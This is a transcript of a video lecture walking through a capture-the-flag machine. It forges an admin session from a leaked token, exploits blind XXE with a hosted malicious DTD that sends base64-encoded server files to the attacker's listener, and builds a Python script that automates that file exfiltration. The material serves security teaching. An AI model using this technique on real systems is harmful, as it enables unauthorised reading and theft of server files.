Hello and welcome. So in this lecture, we are going to write a Python script that will exfiltrate data out of band by performing a blind SSRF or blind server-side request forgery. So let me give you a quick overview of the video. Before writing the script, let me show you why are we going to write the script. Okay. So we can see we have a static website right here which has this login and register buttons. Fine. And if you do some enumeration using GoBuster, you'll discover that there is a hidden subdomain which is forum.collect.htp. And yeah, so I'm already logged in as quadruped and my password is 123456778. And I can go to this collect forum and read all of the comments. Is this I had problems with the pollution API. You'll go there and you see that there is a burp proxy history file which is proxyhistory.txt. I've copied all of this and it is right here in front of you. Right, so if you'll read this file carefully, you'll discover that there are some important entries, one of which is set role admin. Right, so seems like this sets the role to admin in somewhat manner. Okay, we don't know what it does actually, and this is base64 encoded data. So let's decode this to see what it is. So let me copy it till here, control C to copy, and let's go to the terminator. We are going to do echo, paste this, and okay, let's add the dash n option and pipe it to base64-d to decoded. As we can see, these are the headers, and we are going to send a post request to set role admin. The host is collect.htp. The important thing is this: they are sending a token. Okay, so if I send this token or I create a forged request and I send this token, meaning that the PHP session ID cookie, which will be associated with my credentials, quadruped, and my password, the backend is going to set the privileges of this cookie as admin. Okay, so let's go to burpsuite and let's create this forged request. So first of all, we are going to go to home. So here we go. So after logging into the website, we can see that we still have nothing much to do, but we are going to create a forged request which should have the same request headers as you are watching on the screen, and we are going to send this token in the post body, right? So let me turn on the interceptor and let's go to the settings to use burp as a proxy. So let's set burp as the proxy. Fine. So I'm already logged in, so I must have a PHP session ID. Let's refresh the page and here we go with the request. Let's send the request, or before sending the request, we are going to change the request method to post, and we are going to send the request to set role admin. Okay, we have the PHP session ID and we are going to send this token as the post body in the post request. Let's copy this token and we are going to paste the token right here. And if I forward the request, as we can see, we are automatically redirected to the endpoint called admin, and now we have access to the collect administration. Okay, and we can register user in pollution API. Fine. So now we can test the pollution API. Hello quadruped, welcome to the administration of collect. Okay, that's cool. Now we are going to again turn the interceptor on and let's register as a test user. Just click on submit, intercept the request again, forward the request to repeater, and as you can see, user registered successfully, but this is JSON data, because if you go to the repeater and send the request again, we can see the user already exists. Fine, because we have already registered this as a user. So we can see that XML is used to transport the data from front end to the back end, and whenever we see XML, we can just perform the normal XML external entity injection, right? So I have the payload right here in my notes, and you can get the write-up of this machine in the description of this video. So let's copy this payload and paste it here. So what are we doing? So this is a document type definition called foo, and we are going to create a parametric entity called XXE, which is using the system keyword to evaluate the value of the parameter entity called XXE, and parameter entities are only referenced within the DTD, right? So let's do HTTP, and it's 10.10.14.4. So that's the IP address of my tunnel 0 interface, and that's it. And if I go there, we can just do netcat-nvlp on port 8000, or you can also use the Python 3 basic http.server. Let's send the request, and as we can see, we are really hijacking the request and it is being intercepted by the netcat. And as we can see, connect to this from unknown this, so this is the IP address of the machine. So this confirms a blind XXE injection at this point just before the root tag in XML, right? So let's close this, and as soon as we close this, this will load, right? So at this point we see that there is a blind XXE. Now how do we exfiltrate the data out of blind XXE? So we can really host a malicious DTD on our web server, and when that DTD will be downloaded, a GET request will be made to the web server, which we are going to start on our local machine. So let me clear the terminal and let's do ls. We have no file right here except the proxy http.request. I'm going to open a file in Genie, and that file is going to be m.dtd. Fine, so we do have the file, and in this malicious DTD I'm going to create some things or some parametric entities which will be used to exfiltrate the data out of band. So let's go to VS Code and let's refresh this. We have nothing, so let's create m.dtd. So let's create the malicious DTD which will be hosted on the Python web server, which is on this local machine. So first of all, I'm going to create a parameter entity called file, and the value of this entity will be evaluated using the system keyword. Okay, and between the quotation marks we are going to place the value of this entity, which is the PHP filter convert wrapper. Dot base 64 dash encode, and we have resource equals etc hostname, right? In the next line we are going to create another parametric entity, right? Let's name this as eval. Okay, and this will be evaluated using whatever is placed between these quotation marks. Now the thing here is we are going to create another parametric entity. Okay, let's name this exfiltrate, right? And the value of this will again use the system keyword to evaluate, and we are putting the value in single quotation marks because we have already used the double quotation marks. So let's do http colon colon 10 10 14 14 on port 8000, and we need to use a question mark x equals percentage file and a semicolon. Okay, so finally we are going to reference the entities we just created, which is eval, and then we are going to evaluate another entity called exfiltrate. So let me explain you this payload. What this will do is, first of all, we are going to create a parametric entity called file. The value of this entity, which will be evaluated using the system keyword, and we are using a PHP wrapper, and this wrapper will encode the contents of the file etc hostname using base64 encoding, and store the contents or the base64 encoded contents in the parameter entity called file. Now in the next line we are referencing that parameter entity using the percentage file semicolon thing. Okay, and this as a value is being sent to the web server as a web request in the query parameter x. So this can be any parameter of your choice. In the second line we are creating another parameter entity called eval, and the value of this is dynamically evaluated by creating another parametric entity called exfiltrate, and the value of this entity, which is to send a web request, a get request to our Python web server. The catch is that we are using two percentage symbols in the same line. So the XML parser sitting on the backend will be confused which entity to be evaluated first. Okay, because we are calling both of the entities. Now we are going to remove this percentage sign, and we are going to perform HTML encoding using burpsuite. So as we can see, if we encode a percentage symbol in HTML encoding, we got this. So let's Control C to copy this, and we are going to paste that here. Control S to save this, and we don't need to copy that because we are going to host that on our web server. Fine. So let's do ls cat m.dtd, Seems like we are all good to go. So let's start the basic Python 3 http.server on port 8000. Fine. And from the repeater, I'm going to send the web request. And as we can see, the value of the file etc hostname is retrieved. Okay, so if we copy this file and we do echo dash n a64-t. So the hostname of the target OS is pollution. So this is a way of exfiltrating the sensitive contents from the backend. Now we need to read a lot of files from the backend server. So this is not a good practice to manually change or edit the m.dtd file and send a web request using burpsuite and exfiltrate the contents right here. And then finally we need to decode this thing to get the contents of the file in UTF-8 encoding. So the crux of the story is that we are going to write a Python script that will do all of this magic just by executing the script. So it's time for scripting. So far so good. If we do ls, we have a file called m.dtd. If we do cat m.dtd, we have the file. So as we can see, if I change the content of the m.dtd and if I change this to etc hosts, so that means we are going to read this particular file from the web server, right? So it's time for us to start the Python 3 web server. So we are using the -m to specify the module, which is http.server, and I would like to start the web server on port 8000. Now if I send the request, we can see we got the base64 encoded contents of the etc host file. So let me split the terminal. We can do echo -n v and we can decode this string right here. So as we can see, we are able to gather subdomains about the target web server, which is developers.collect.htp, forum.collect.htp. So we already discovered these two subdomains using GoBuster or vhost enumeration mode. So it's time for some scripting. So let's go to VS Code. And what if I want to change this by taking the user input? So I'm going to create a new Python script called update-dtd.py. So this is a Python file, and why I highlighted one thing right now is that -m option is used to include a module. So that means http.server is a module. So we are going to import that module in our script. So import http.server, and next thing is we are going to import socket server. Right, so for now we only need these two modules. Now I'm going to define a function called as start the web server. Okay, and this function, so how to start a web server? So I would like to create a variable called as httpd, and this is equal to the web server we are going to create. So in one line we can create the web server. So we can do socket server dot tcp server, and this tcp server function or this method takes two arguments. The first is going to be the one second the first is going to be the IPN port, and the second is going to be the handler. Okay, so this is going to be the request handler. Fine, and this is going to be an empty string for the IP address and port 8000 in which we are interested. Now as we can see, we have not created a handler yet, so I would like to create a handler. Handler is going to be http.server and simple http request handler. So what this will do is, by this method we are going to create a handler, and we are going to create a web server using httpd variable. So it is using the module called socket server, and the method is tcp server. Fine. Now our web server will listen on any IP address on port 8000, and it is going to use this handler as the handler for handling the web requests coming to the web server. In the next line, I would like to print a decent line which will ensure that the web server was successfully started. So on port 8000. So I hope this is okay. And finally, I'm going to start the httpd server dot serve forever. Fine. So this function is over. So whenever we are going to call this function, the web server will be started. Now we are going to define another function which is going to be prompt the user, which is going to take no input, I guess. Fine. So we are going to prompt the user, and this is going to create a variable called as substitution, and this is equal to input. Now it is input Fine. And finally, it is going to return the value of this variable. Fine. In the next step, I'm going to create another function which will update the DTD based on user input. Fine. So for example, I have a string called as content, and this is equal to an empty string, right? So for example, if this is equal to hello, right? And in the next thing, I'm going to use the same with open. So I'm going to open a file called as m.dtd, and I want to open this file with write permissions, and I'm going to open this as a file. One second. Yeah, I'm going to open this as a file, and I'm going to use file.write method to write the content to the file. So this is the crux of this method, which is update-dtd. So we are going to create a function called update-dtd, and this function will simply write the content to this particular file called m.dtd, which is what we want to achieve. So the content should be this, all of this, but we cannot just directly place this because this is containing double quotation marks, symbol quotation marks, and a lot of stuff. So this is a payload, and for including the substitution as a user input in this place, we need to use the format string specifier of Python. So what we are going to do is we are going to remove this, and we are going to use the format string by typing the F word right here. Okay, and if I place the first line of our code, which is nothing but this, is to control C to copy this, and we can paste it here. Okay, now we have a problem. This is a double quotation mark, and this is also a double quotation mark. So this is definitely going to interfere with the format string specifier. So we need to use the single quotation mark, and the same thing should be here. Fine. The second important thing here is we don't need to hard code this value. We need to take this from the user, and whatever is returned by the prompt user function is this substitution. So we are going to use that thing right here. Substitution. Okay. And update DTD should take the file path as an input, the file to modify. Okay, so this variable will contain the address to the file m.dtd, which is stored in the opt directory under the folder scripting. Fine. So we are using the format string specifier to dynamically update the value of this substitution. Okay, in the next step, we are going to write the second line. So content plus equals format string and double quotation marks. So we are going to encounter other problem as we copy this piece of line. So let's do Control C to copy this, and we can paste it here. Okay, as we can see, this is definitely interfering with the format string specifier. So in order to fix this, first of all, we need to, what we can do right here. So yeah, we need to escape this double quotation mark by using a backslash, and the same thing should be done for this particular thing. Seems like we are good to go. And one thing to note is this is the first line, this is the second line. So after this point, we should insert a new line character, which is nothing but a backslash n in Python. So same thing should be done for the line 2, which is backslash n. Okay, so I'm going to do content plus equals a format string. So we don't need a format string, or we can directly include the parametric entities which are referenced. So Control C to copy this, can paste it, plus equals exfiltrate, right? So let's copy this and paste it here. So we are ready with the content. So our content will contain this payload. We only need to specify backslash n and a backslash n. So these are new line characters. Okay, so this is constituting our payload, and this is taking file path as an input. Okay, and this should take the input of file path or substitution. So this should take the input of substitution, right? So if you pass substitution here, it will be substituted here, and accordingly the value of m.dtd will be updated. Now we need a colon here, so just syntax errors, and we can print something, and let's call it m.dtd dated. Okay, so we can successfully exit the function as well. Now finally I'm going to do underscore name is equal to what. So here we go, right? So first of all, we are going to call the function called as prompt user. Okay, and whatever is returned by this function, we are going to store that in substitution. Okay, and then we are going to call the function called as update-dtd, which is going to take the input of substitution, right? We don't need the file path because we are already specifying the file m.dtd because it is hard coded, right? It is hard coded right here, so we don't need the file path. Fine. So the next thing is we have called this function, and finally we are going to start the web server by just doing this. So I hope we are good to go. So this is the script we have wrote so far. So this script will do one function, that is going to update the DTD and start the Python web server. Okay. So far we have not created any custom handler. So we are using the base class, which is this, right? So let's go to the Terminator and Control C out of this, Control C to exit this. We can do ls. We have the script update-dtd.py. So let me show you. If we can remove the file m.dtd, and if we do ls, we have no file called as malicious.dtd. Now let's do python 3 update-dtd.py, and we can simply hit enter. So let's enter test, or we can do etc post. Fine. So as we can see, the file m.dtd is updated successfully. So let me clear the terminal, and if I try to make a curl request to check if my web server is working properly, it should record a get request made by curl. So http, we have 10.10.14.14 on port 8000. Okay, and let's try to download this file called as m.dtd, and let's use the -s mode. So as we can see, a get request was recorded, and this is containing the updated data which was inputted by the user, as you can see. Fine. Now I'm going to send this request again, and as we can see, we are getting the value of the query string parameter x. So we are done with one task, that is to take the user input of the file to be retrieved from the backend, and the base64 encoded content is being displayed on the screen to us. So far so good, whatever we have achieved is great, but the problem is the goal of this lecture is to create a replica of what burpsuite can do for us. Burpsuite can send a post request by including the payload, and in the backend we are going to start a Python 3 web server which is hosting the malicious updated DTD. Okay, so we are going to copy this burpsuite post request to a file, and let's call it malicious.request. Okay, so this is malicious.request. We are copying this to a file, and after copying this to a file, let's see what we have copied. As you can see, we have the post request to the endpoint called API. So we need to send a post request to this particular endpoint API. This should be the host, and this is going to be the post body. Fine. Now we need to pass this post request. So for that, we are going to create another function called as parse post request. And before that, we would like to parse the command line argument by importing a module that is called as argparse. Fine. So let's go to the bottom, and at this point we are going to create a parser. So parser is equal to argparse dot argument parser, and this has a description. So let's say parse post dot request file. Okay, after that we are going to use this parser to add an argument, and the argument should be -r. At this point there is one important thing I would like to mention, and the thing is that if I enter here --request, okay, and the type of this is going to be a string, and I would like to enter a help message, so that will be please specify the post.request file. Okay, The important thing here is the dash dash request variable. So this is a variable. Okay, this is not appearing like a variable, but this is a variable in somewhat way. So let me explain you what I mean. So if I do args, so let me create a variable args, and that variable is going to be parser dot parse the args. So this parse args method, or this function, will parse the arguments which are passed by the user on the command line, and finally I'm going to print the args. Okay, so this is what we are doing, and I would like to comment this start web server function because I know that function works fine. So seems like we're good to go. So let's do python 3 update-dtd.py and dash r to pass the malicious.request as a command line argument. Okay, so if I hit enter, we see 1 2 3, and as we can see we have this input. So this was the command line argument passed by the user, as you can see, and this is stored in a variable called as request. Now if you want to access this variable, it is very simple. We can just do args dot request. Okay, so let's try to rerun the script. Now as we can see, we are now printing the malicious.request. Now why this is handy, because when we are going to write a function called as parse post request, that function will require this thing as the input of file path. And if we know this is the input of file path, we can use the with open function of Python to read this file and read the headers and the post body to make the subsequent post request. Let's go to VS Code, and seems like this is all good to go. So let's do if args dot request. So if this has a value, so we need to write. So if this has a value, I'm going to print args dot request. So first we should check if this works or not. Okay, yeah, so this works. And what is the thing we can do next? We are going to write another function which is going to be define a function called as parse post request. So this function will parse this request file as you are watching on the screen. So we are writing a function that will parse the contents of this malicious.request file. Fine. So we have the function called as parse post request. So this should take the input of file underscore path. Okay, and we know that file path is nothing but the args.request. So I guess we can call that function right here. So that should be parse post request. But this function needs to have something to return to us. So we are going to write something here. So let's say with open, and this should contain this file path, and we need to open this file with read permissions. Open this as a file, and I'm going to do lines is equal to file dot read lines. So what this function will do is, let me show you in this. So as we can see, we have the function called as read lines. So if you are reading a text file, so we are opening this file with read permissions. So this method will create an array of lines. As you can see, the first element is the line, second element is also a line, and so on. Okay, so I would like to return lines. Yeah, and let's capture the lines here, and we are going to print the lines. So this is a good way of learning. Like when you're scripting, you will know what is actually happening when you're scripting the code. So return, so this function is returning lines and we are printing the lines. So as simple as that. So let's try to rerun the script again. And as we can see, we have an array, and we have the first element of the array as this, second element, and so on. Now what is important here is this is the request header, this is the request header, but this is not the request header. So we need to exclude this. So this is going to be the request line, or the first line of the post request file. So we are going to modify the function. So let's do request underscore line, that's a variable, and that should be what? That should be lines 0 dot strip. Okay, and if the request line dot starts with post. Okay, so we will know if the request line starts with post, we are going to print the request line. Okay, so I hope it is clear till this point. So let's try to rerun the script again, and yeah. So as we can see, the first line is printed. Now what's important to me is /API, because this is the point, or this is the endpoint at which I will be making the, or I will be sending the post request. So I want Python to send the post request to this endpoint called /API. So I will need to extract this value. So how do we do that? So it's very simple. We just need to create a dictionary. So let's create a dictionary called as path, and that is equal to an empty dictionary. Okay, and in this function we need to perform a key value assignment. So we can do path, the key is going to be endpoint, and endpoint is equal to nothing but the what, it is going to be request line dot split, and by default the split character is a space. Okay, and comma. So the split function takes two arguments. The first is the character, which will be you can call it as internal field line separator, or it is a separator. So by default it is a space, but we are still specifying it. So request line dot split, a space, comma, followed by nothing, because that argument is optional, and this is going to return us an array. So I'm going to read the second element, which has the index value of 1, right? So this is returning what? This is returning lines, and I want to return it path as well. So this is returning path, so lines comma path, fine. And if I do print path dot get, and we need to get the value of the endpoint. So this is very simple. What we are doing, let me summarize. We are first of all extracting the request line as we did. So this is going to be the request line. We are splitting this line based on a space, and the second element is going to have the index value of 1. So as we do here, this has the index value of 1, and we are performing a key value assignment at this point to the dictionary called path, and we are returning that complete dictionary from this function. And when this function is called, we are going to print that dictionary dot get endpoint. So what does this mean is we are going to get the value of the key called endpoint, which is nothing but the API endpoint path. So let's run the script again, and as we can see, we have /API. So that's cool. And next thing what we want to achieve is we are going to create another dictionary called as headers. So this dictionary will be used to store the request headers, and we need the body. So we are setting the is body variable to false in the starting, because we don't know when we encounter the body. Next thing is we are going to assign body empty string, an empty string. So initially the body is an empty string. Okay, so after this thing I'm going to do for line in lines, right? But we want to exclude the first line because that will not contain the request headers or the request body as well. So I would do 1 followed by a colon. So what this means is that except the first line, I want to process the for loop on all of the remaining lines. So this is the malicious.request. This is the first line. I want all of these lines to be processed by the for loop. So that's why I am doing this 1 followed by a colon. So in this loop, I'm going to do if, what we can do here. So we can do if line is equal to an empty string. So if line is an empty string, we are going to set the value of the is body to true. Okay, and we are going to do if what, if is body, meaning that if that thing is true, we are going to do body, or update the value of the variable body. So that is going to be plus equals line. So body is equal to body plus line. So initially the body was a empty string, so we are just adding the value of the line. Okay, and that's it. I would like to return body as well, and let's capture it here. So we have it here. So this is body, and I would like to print body instead of line to see if it works. But I think this thing won't work as well, because when we are entering this thing, the first thing we should do before entering the for loop, what we should do is we should do line dot, or we can update the value of each line by doing line is equal to line dot strip. So the dot strip method will remove any starting or trailing spaces or any characters from the line, so that the if statements will be able to read the lines accordingly. Control S to save the script, and let's clear the terminal and let's see if it works. So we have, this is updated, and as we can see, this is the request body. So we are successfully able to intercept the request body from the parsed post request file. So this is good. And next thing is, what I want is, we have path headers is body, we have this if, and next we are going to have an else if, the short is elif. So else if you encounter a colon in any line, then I would like to process that line as key value something, right? So at this point, what we can do, so let's do line dot split. So whenever we see a colon followed by a space, so if you go to the malicious.request, you can see we have a colon followed by a space. So whenever our program will see the colon followed by a space, and we only need the one occurrence of it, so that's the optional argument, but I am still passing it. So if you see the first occurrence of a colon followed by a space, so what this will return is, this will return a, what this will return a dictionary of two things, key and value. So if you want to see, you can print it as well. Okay, so let's rerun the script again to see what happens. So as we can see, we have host, collect.htp, user agent, and this. So we have the key value pairs. Now we are going to follow a key value assignment to assign the keys the value. Okay, so I would like to assign host the value of collect.htp. That is very important. So let's do it. So we have it right here. Okay, we don't need this. So let's do key comma value, and that should be equated with what we have here. Remove this print statement. Okay, so we are till here at this point, and we are going to do else. You need to print. So let's do a format string specifier. The line does not have a colon. Okay, so if the line is not having a colon, then we can print the error. Okay, so we should return what? Okay, we still have a problem. We haven't performed the key value assignment. So let's do headers, and this should be the key, and this should be equated with the value. Okay, and we are going to return headers as well. So we are returning lines, path, body, and headers. So I don't think we should return lines or something. Okay, so let's control S to save this, and we have lines. Okay, and we have it here. So I'm not going to print the body, I'm not going to print the endpoint, and we have path, body, and headers. Right, so we have the headers, and if I wish to print the headers, we see if we can process the headers. So as we can see, we have a very nice dictionary of headers. So dictionary starts with a curly bracket, and array starts with a square bracket. That's a very common thing to know. So we have the headers, right? So we are all good to go, and the next thing is we are going to incorporate a function that will be used to make a post request to the target web server. Okay, so first of all I'm going to finish this if else loop. So let's print something. Fine. So now in the next step I'm going to check if a string called as host is not in headers, then I'm going to exit the script. But this is not a good coding practice, so we should show an error to the user and we should say that missing host header. So if host as a header is missing, then this script will not be able to make the post request. Fine. So if there is a host header, then we can do one thing. We can say we have something like host is equal to what? Headers, and that should be host. Okay. In the next step, I'm going to get the value of the API endpoint, which is path, and that will be retrieved from the dictionary path.get method, and we are going to specify the endpoint. Okay. After this, we are all good to go to construct the URL, and the URL is equal to the format string, and we have HTTP followed by the host followed by the path. So this is all good. So let's print the URL to see if it works. Okay, so that's good. So let's do python 3 update-dtd.py, and we have -r to pipe this too. So as we can see, we are able to retrieve the URL, that is collect.htp/API. So now that we have the URL, we have the headers, we have the post body, so we are all set to make the post request. Okay, so let's go to burpsuite, and this was the history. Let's go to VS Code. Now after this, so we need to check that if path also exists. So I'm going to do if host and path. If both of the values exist, then only we will be able to construct the URL. So let's Control X to copy this and paste it here. Okay. After that, we are going to make the post request, right? So let's create a variable called as response that will contain the response of the post request. So we are going to do request, but we don't have that module included so far. So we need to include that module. So import request, which are URL, headers, we have the data as the body, which is the post data. And in the next line, we can print what we can print. We can print, yeah, it is response dot text. Fine. So I don't think we should be printing the URL anymore. So let's erase that. Control S to save the script, and let's clear the terminal. So let's see. And as we can see, we are sending a post request and we are getting this reply. Fine. Now this is the time to start the daemon, and the daemon at this point is the web server, which is, where is the web server? And yeah, so that works. So we have the function called as start web server. If I try to send the post request again, you will notice something interesting. And as we can see, the script is stuck at some point because there's no way out from this web server. Once the serve forever method starts, the program will not continue the execution ahead of this line, which is line number 53. So the code will be stuck at this point. So in order to solve this issue, we can include another module called as import to use the concept of threading. Okay, and we are going to start the web server in a separate thread, right? So let's close this and let's go to VS Code. I'm going to delete this from here, and I'm going to start the web server just before sending the post request, right? And we are not going to start the web server like so. First of all, I'm going to create a web server thread, and that will be equal to threading dot thread. So we are going to create a thread that used to have a target, and the target is going to be the function which is start web server. Okay, so after this we are going to call that variable and call a method called as start that will simply start the web server in a separate thread, and it won't stop the program execution. So if we do Control S to save the script, and let me clear the terminal, let's do this, etc hosts, and as we can see, we are receiving the response from the backend, and we are also receiving this thing for which we have waited so long for 40 minutes. So this is definitely going to work because our script contains all the logic that needs for this. Okay, so I'm going to Control C out of this, clear the terminal. Another thing that is very important I would like to show you, and the thing is, when we send the post request, we don't know what's happening, how the post request is made, and what actually is inside the post request. So at this point we are going to use proxy chains. So let me show you something. So open the file and Control L. We are going to navigate to the etc proxychains4.conf, and wow, we need to do that again. So open the file, okay, and Control L etc proxychains4.conf. So here we go with the file. So as you can see in this proxy chains configuration file, we can add custom proxies. So I'm using this IPN port as an HTTP proxy, and we know in advance that if we go to the Firefox and we see settings, we can see that Firefox is setting the same IPN port as the proxy. So that means burpsuite is running on that proxy. So we are very close to this now, right? So we can close this and we can simply use proxy chains. Fine. And one thing I would like to edit is we are not going to print the response.txt because it is full of errors. Fine. So I'm going to do what? So let's do. So this was the usual command we used to execute. Now I'm going to append proxy chains in front of this. Now what this will do is forward all the traffic from our script to burpsuite, and burpsuite will be listening for any incoming requests right here. If I hit enter and if I try to do etc, what do we do? Hostname. Let's do enter. Now as we can see, burp is pinging, and this is the request which is created by our Python script, and this is the exact same replica as we saw earlier. So this and this, both of the requests are having the same, what you can say, same header, same body, right? So let's turn off. As soon as we turn this off, we can see we are getting the value of hostname. Fine. And if I send this request from repeater, you'll see that this script works again. So this script is now fully functional. We just need to fix some loose ends, as we can see. Okay, so this was the concept of proxy chains, and without this concept, I wouldn't be able to write such a huge script of 100 lines, which does so much of practical stuff. Fine, let's do Control C out of this, and so that was all about proxy chains. So in the next step, what we can do is, yeah, we have another problem. The problem is that our script is only making one post request, which we don't want. We want to update the value of m.dtd and send the post request, get the response, decode the response, and then we need to send another post request by updating the value of m.dtd again by taking the user input. So what I mean is, in our file, if you see, we have these two functions right here. I'm going to remove them from here, and after starting the web server, I'm going to start a while loop. So while, and what we can do, yeah, we need to do while true. Okay, then we can paste these functions right here. One second. Yeah, while true, we are going to try something, and we are going to accept keyboard interrupt, and we are going to break. Fine. So we just need to fix some syntax, nothing else. Just do Control X, and one second, try this, and Control X. Okay, Control X. So Python is like very careful about the indentation errors, so that's why I'm fixing the indents. Okay, so what's happening here is we are doing substitution, which is prompt user. So while true, it is going to try this, send the post request. Okay, after sending the post request, we are going to get the response, and we have our handler right in this function. Where is the web server function? Yeah, so we are using the base class in the handler, so we have still not created the custom handler which will be used to decode the base 64 encoded you can say sensitive files or something, right? So let's do control S to save, and we have if host not in headers, and if this we are going to do else print, and we are going to print invalid you can say invalid URL, because host or path something is missing, we don't know. Yeah, so I think this is good to go, and we can just do this, and I don't want to transfer the traffic proxy chains. Perfect. So let's try to retrieve the contents of etc host name. Okay, so as we can see we are getting it. Now I try to extract etc hosts, and as you can see this is what we wanted to achieve. So this was very amazing. Now we have only one thing left, and the thing is how we will be able to decode this base 64 string. Okay, so far our script looks pretty good, but we have some problems, so we need to refactor the code. So let's say I try to run this script, and let's say etc. Okay, so this is working fine, but if I do control C again, and I run the script again, we encounter this problem. Now this is saying us that we have an OS error, and it is saying address is already in use, but we have no process running on port 8000. So why is this happening? This is happening because we are creating a web server thread, as you can see. So this is the thread, and we are starting this thread, but after the program execution we never joined the thread. So we need to join the thread. So let's do web server thread dot join. Okay, so this will fix that error. Now we have another problem. So we are going to create a custom handler. Okay, so we are going to create a custom handler that will handle the web request coming to our Python web server accordingly. So we are going to create a custom handler. Okay, and this is going to be a class. So I'm going to say we are going to create a class, and that is going to be the custom handler. It is going to take http.server.SimpleHTTPRequestHandler, and after that we are going to define a function which is going to be do get. Okay, now do get is a predefined function in the base class, so we cannot change its name, we can only override it, and we can simply override it by typing the code right here. So the very first thing I would like to do is, first of all, I'm going to import some important modules from urllib.parse, and I'm going to import the module called url parse, and another module is going to be parse query string. Okay, so these are the two modules we are going to import, and after importing these modules we can use them as usual. We are going to create a variable called parsed url, and that variable is going to be evaluated by using the function called as url parse, and this is going to take the input of the self dot path. Okay, and after this we are going to pass the query string, so we can extract the parameter value, or we can simply do parse qs. We are going to call this function, and this function is going to take the input of the parsed url dot query. Okay, and let's store this in something called as parameter, or first of all we should try printing this thing. Okay, and we should do something called as super dot do get. So this is just a way of creating this. Okay, so what we are doing, we are creating custom handler so that we will be able to handle the web request accordingly. What are we doing? So first of all we are going to create a custom handler. That custom handler is going to call the function url parse, and this function is going to pass the url for us, and from the passed url we are going to read the query, and we are just printing this stuff right here. So I think we are good to go. So control C, clear the terminal, we can run the script again, and here we go. Fine. So this is the thing. So this is a dictionary. As you can see, I have told you that a dictionary starts with a curly brace and a array starts with a square bracket. Okay. So we can see that we have a dictionary, and in the dictionary we have this key and this value. The value is a dictionary and the key is a string. Okay. So we need the string first of all. So what we are going to do, we are going to just remove the print function right here, and let's store this parameter. Okay. So after that I'm going to create an if loop. So if parameter, or we can more precisely do if x in parameter, then I want you to print the parameter. So this is a simple code. Now how we can modify this? So we know that parameter is a dictionary and we need to access the value, which is we need to access the value. So first let's try to access the string. So I want to access this string and I want to access the first value which has the index of 0. Okay, so I think this will only print the base64 encoded content for us. Okay, just clear the terminal, run this script again, and here we go. As you can see, we don't have that address already in use error. So let's do etc hostname, and as you can see, only the base64 encoded contents are being printed on the terminal. Okay, so now is the time to decode these contents. Fine. So for this we need to import another module called as base64. So let's import. Okay, and let's say we have the encoded value. So let's store this in something called as value, and value is going to be this. Fine. And what I want to do is we are going to use base64.b64 decode, and I want to decode this value. Okay, and I want to decode this further into UTF-8 encoding. Okay, and it will be better if we store this in a variable called as decoded value. Okay, and we can just print the decoded value. Okay, so seems like we are all good to go. So let's control C out of this again, and let's try to run this tc. So as you can see, the value of the string is decoded and the value is pollution. Okay, so the script is working and the final task is also done. So let's modify the code a little bit, and what we can do. So we still have some problems. So what are the problems? So we can see that we have the decoded value, right? And the first thing is we can use the format strings instead of the print statement, like so. So we can do if and wrap this in curly brackets, and we can see. Okay, so this was the first thing. The second thing is, if an invalid base64 string occurs, then this parser will not be able to decode the value. So we need to put a try and except thing here. Okay, so let's do this, and we need to have this as well. Okay, and we need to have except base64 dot bin sky, that stands for binary sky, and dot error. Okay, if an error occurs, then we are going to print something, and let's use the format string specifier, and that should be invalid base64 string found, and the string is simply going to be what it is going to be, parameter value. Fine, so this is good. Now still we have something, I will show you that on terminal. So till this we are good to go. So let's minimize the terminal, control C to copy this, clear the terminal again, run the script again, and we have it here. So let's do etc, and hosts. So this is decoding it fine. Now what if I try to read a file that is much larger, right? And it has some different characters. So etc apache 2 sites enabled, and we have collect.htb.conf. So it is a good practice to save the configuration files like domain.conf convention. Okay, so if I try to read this file and we are getting an error, so we can see invalid base64 string found. So as you can see, this is a valid base64 string if there was a plus sign instead of this space. So just because of this space, the base64 parser is thinking that this is an invalid base64 string. So we need to do something for this. So that is going to be what? We are going to do value dot replace, and we are interested in replacing any space with a plus. Now the thing is, we have replaced the space with the plus symbol and we need to update the value. So we are going to say value is equal to value dot replace the space with a plus. So we are going to updating this value by this line. Okay, so this is the final script we always wanted to achieve. So let's hit enter, and as you can see, this is working. And if I do etc, we have apache 2 sites enabled, we have collect.htb.conf, and as we can see, we are not getting the same error. So that was all about this lecture or this script. So this is the final script, as you can see on this uh, update-dtd.py, and you will get a copy of this script in the description of this video. And I hope you got it what I created, and this script is totally created by me. Ipsec also wrote a similar script, but I didn't copy it from him. His script is completely different. I don't even know his script, but this is my script, and I hope you enjoyed this lecture. So we will meet in the next lecture. Till then, have a wonderful day ahead, and thank you.